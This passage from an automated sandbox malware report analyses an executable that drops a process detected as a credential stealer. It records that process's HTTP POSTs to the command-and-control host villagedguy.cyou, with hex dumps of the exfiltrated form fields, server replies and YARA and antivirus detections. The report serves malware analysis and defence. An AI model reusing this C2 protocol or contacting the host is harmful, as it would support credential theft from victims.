                                                                                                                                                                        2024-10-31 00:05:28 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
                                                                                                                                                                        2024-10-31 00:05:28 UTC5102OUTData Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00
                                                                                                                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                        2024-10-31 00:05:30 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:30 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=r1qu1m2pnumvm6vqfhjp6cdkkg; expires=Sun, 23-Feb-2025 17:52:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUhN22AzAClVyrRVPzXErOPkexlhir5q9tPAdtACBEatWEKqlOjUEvGihjetxb3mlt00xCidIoV68BjFhwk505rN%2BeXOs6vdI35%2FwtJ%2BXOSgRju0bF6nqaxazhf8T%2FzK8Jpw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64c72ec76b79-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21395&delivery_rate=2656880&cwnd=239&unsent_bytes=0&cid=b101e6337c9b8097&ts=2142&x=0"
                                                                                                                                                                        2024-10-31 00:05:30 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.449742104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:31 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 3802
                                                                                                                                                                        Host: villagedguy.cyou
                                                                                                                                                                        2024-10-31 00:05:31 UTC3802OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
                                                                                                                                                                        2024-10-31 00:05:32 UTC1010INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:32 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=rct5djjme2ri6ta2g9bq8daomm; expires=Sun, 23-Feb-2025 17:52:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwKxEHzs8oF1q6FlDADcC92k%2BW7kPQeRX5Pv%2B%2F70CrmVJjKxxSHAMHe%2FzLFgILVxnlUAjRtpIZy3ElJs0N1Sv8TCQ6wg7HhiaNsYMwAfaR2hXH3SJ8XWsq9XsuwEFryN2oNj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64da6c4c2ff0-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1944&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=4719&delivery_rate=1427304&cwnd=239&unsent_bytes=0&cid=07b59ef199ee70f3&ts=480&x=0"
                                                                                                                                                                        2024-10-31 00:05:32 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.449743104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:33 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 3818
                                                                                                                                                                        Host: villagedguy.cyou
                                                                                                                                                                        2024-10-31 00:05:33 UTC3818OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
                                                                                                                                                                        2024-10-31 00:05:33 UTC1008INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:33 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=p9anensbm23h0oe95a596m64de; expires=Sun, 23-Feb-2025 17:52:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpFVmowqbp49kzMs%2BGe9FBVExu%2FW8JnJmbzrbasIsWuz5wcak1uN3xSxsVdaoQ2iyyAN9RnwjSduCLTBYuEVkJRVBVBRP%2FHAZS8lnHAjpkck8hbiiFEdW8EY7WYq5nKk3HOq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64e34c0028d1-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=4735&delivery_rate=2558303&cwnd=251&unsent_bytes=0&cid=d5c2178b049e17df&ts=485&x=0"
                                                                                                                                                                        2024-10-31 00:05:33 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.449744104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:34 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 1249
                                                                                                                                                                        Host: villagedguy.cyou
                                                                                                                                                                        2024-10-31 00:05:34 UTC1249OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
                                                                                                                                                                        2024-10-31 00:05:34 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:34 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=bcq53aqcleu2sdkdr4p0fnf8nn; expires=Sun, 23-Feb-2025 17:52:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIibD2mtUyAGCFAiSK8RGgFzUd0lgbkKgavyjkuDmWST77OQpEauS64bbLevw3DyRu%2BTCCZ6fb1YfjgWda1h5kKL128nnYGEEm0znaaXl7ko7XIkwZrxpGSewQ8zXkM0YQ5e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64eb1a2247a2-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=996&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2166&delivery_rate=2789980&cwnd=251&unsent_bytes=0&cid=8f5b0fbfcacdffa4&ts=484&x=0"
                                                                                                                                                                        2024-10-31 00:05:34 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        9192.168.2.449745104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:35 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 1117
                                                                                                                                                                        Host: villagedguy.cyou
                                                                                                                                                                        2024-10-31 00:05:35 UTC1117OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
                                                                                                                                                                        2024-10-31 00:05:36 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:35 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=s363s9f4gb305l4loqg6cflpa0; expires=Sun, 23-Feb-2025 17:52:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=muG1CwzFxqdnCkkKkAKFD01jem3oyRZohsUEkPt5erdJxETjp1R%2F9VTr2eB%2BNU2HdUuiHTWVmUBrnI2FtbupRbjyCWMVGeeUGtC6uecjYXctPR5SJpCMtERe4f2UJBN%2BAQDI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64f2bc6ab789-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2034&delivery_rate=2177443&cwnd=39&unsent_bytes=0&cid=8412496ea1b3d61d&ts=339&x=0"
                                                                                                                                                                        2024-10-31 00:05:36 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:20:05:02
                                                                                                                                                                        Start date:30/10/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\HLZwUhcJ28.exe"
                                                                                                                                                                        Imagebase:0x7ff70ecd0000
                                                                                                                                                                        File size:13'706'949 bytes
                                                                                                                                                                        MD5 hash:B736DA6A81E01BEBFDD469D26785E13C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:20:05:04
                                                                                                                                                                        Start date:30/10/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe"
                                                                                                                                                                        Imagebase:0x980000
                                                                                                                                                                        File size:17'504'256 bytes
                                                                                                                                                                        MD5 hash:C1A90FA945AD6CED2104263762C7FCB4
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000001.00000002.1881484672.000000000A7D8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                        • Detection: 83%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:20:05:15
                                                                                                                                                                        Start date:30/10/2024
                                                                                                                                                                        Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                        File size:231'736 bytes
                                                                                                                                                                        MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983486359.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1982657253.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983200877.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983911161.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1981900349.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1982913303.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983703963.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1982143036.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:13.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:32.9%
                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                          Total number of Limit Nodes:48
